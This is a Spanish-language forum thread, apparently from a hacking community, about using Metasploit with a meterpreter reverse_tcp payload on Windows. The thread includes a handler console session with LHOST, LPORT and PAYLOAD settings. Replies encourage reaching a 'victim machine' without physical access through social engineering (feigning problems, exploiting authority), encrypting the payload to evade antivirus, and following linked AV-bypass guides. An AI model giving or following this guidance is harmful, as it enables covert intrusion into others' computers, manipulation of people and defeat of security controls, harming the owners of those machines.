Hola hola!
Quisiera hacerle unas preguntas relacionadas con el uso de esta herramienta.
Estoy apenas relacionándome con ella, recien tengo BT5. y estoy haciendo  pruebas con mis equipos.
Siguiendo un tutorial,  cree el ejecutable con

set PAYLOAD windows/meterpreter/reverse_tcp

Luego con el Msfconsole: use exploit/multi/handler

y pues le hago todo segun el manual, lo meto en una usb y lo ejecuto en la maquina W. enseguida me dió el control absoluto y puedo hacer lo q desee ahi..

Mi pregunta es: esto se puede hacer esto sin que tenga el acceso fisico a la maquina y sin tener que desactivar el AV?

Gracias x cualquier info.

por supuesto! es mas facil usando algo de Ing. Social, lo mas comun es fingir problemas para incentivar el sentimiento de ayuda depende claro de la relacion que se tenga con las personas, si tenes un status social mas elevado la autoridad seria lo mas sencillo. si preferis la manera dura de hacer las cosas les recomiendo leer este tutorial muy extensivo y buenisimo de los creadores de metasploit => http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training el unico problema es que esta en ingles, pero aun asi se aprende muchisimo.

deberias investigar a lo sumo toda la informacion que podas recopilar sobre la maquina victima para asi tener alguna idea de como explotar el sistema, aunque recorda que el sistema mas vulnerable es el humano, suerte! no te olvides de cifrar el payload para que sea indetectable a los antivirus.

Hay otra cosa que quisiera saber...
Estoy haciendo unas pruebas despues de usar el nmap. Cuando me sale lo siguiente, ¿qué significa exactamente?
Handler failed to bind to...xxx.xxx.xxx.xxx
¿Qué es lo que está fallando ahí?

Estoy haciendo pruebas en mis maquinas y ....miren, la cosa va por aquí:

msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.0.5
LHOST => 192.168.0.5
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set EndOnSession false
EndOnSession => false
msf exploit(handler) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(handler) > set RPORT 4244
RPORT => 4244
msf exploit(handler) > exploit

• Started reverse handler on 192.168.0.5:5555
• Starting the payload handler...

Y ahí se queda...
En los tutoriales que he visto, arroja enseguida una conexión....
¿Que no esto teniendo en cuenta?

VIPbie que tipo de vulnerabilidad estas atacando? estas atacando a una maquina como "Client-Side" o directamente sin la interaccion del cliente?

aqui esta la info de como pasar los antivirus => http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass

http://www.google.es/url?sa=t&source=web&cd=1&ved=0CBgQFjAA&url=http%3A%2F%2Frogunix.com%2Fdocs%2FPentesting%2FMetasploit%2520Toolkit%2520for%2520Penetration%2520Testing%2C%2520Exploit%2520Development%2C%2520%26%2520Vulnerability%2520Research.pdf&rct=j&q=metasploit%20toolkit%20filetype%3Apdf&ei=Ul4jTtquI434sgb8zu24Ag&usg=AFQjCNFjjrz1U1AWNZvHTPqMCpp_lD8r1g&cad=rja --> metasploit toolkit bueno para primerizos

http://www.multiupload.com/B0NUUP1I00
http://www.4shared.com/document/HNRid2Uw/metasploit_ch8.html
estos dos tb son de metasploit algo mas avanzado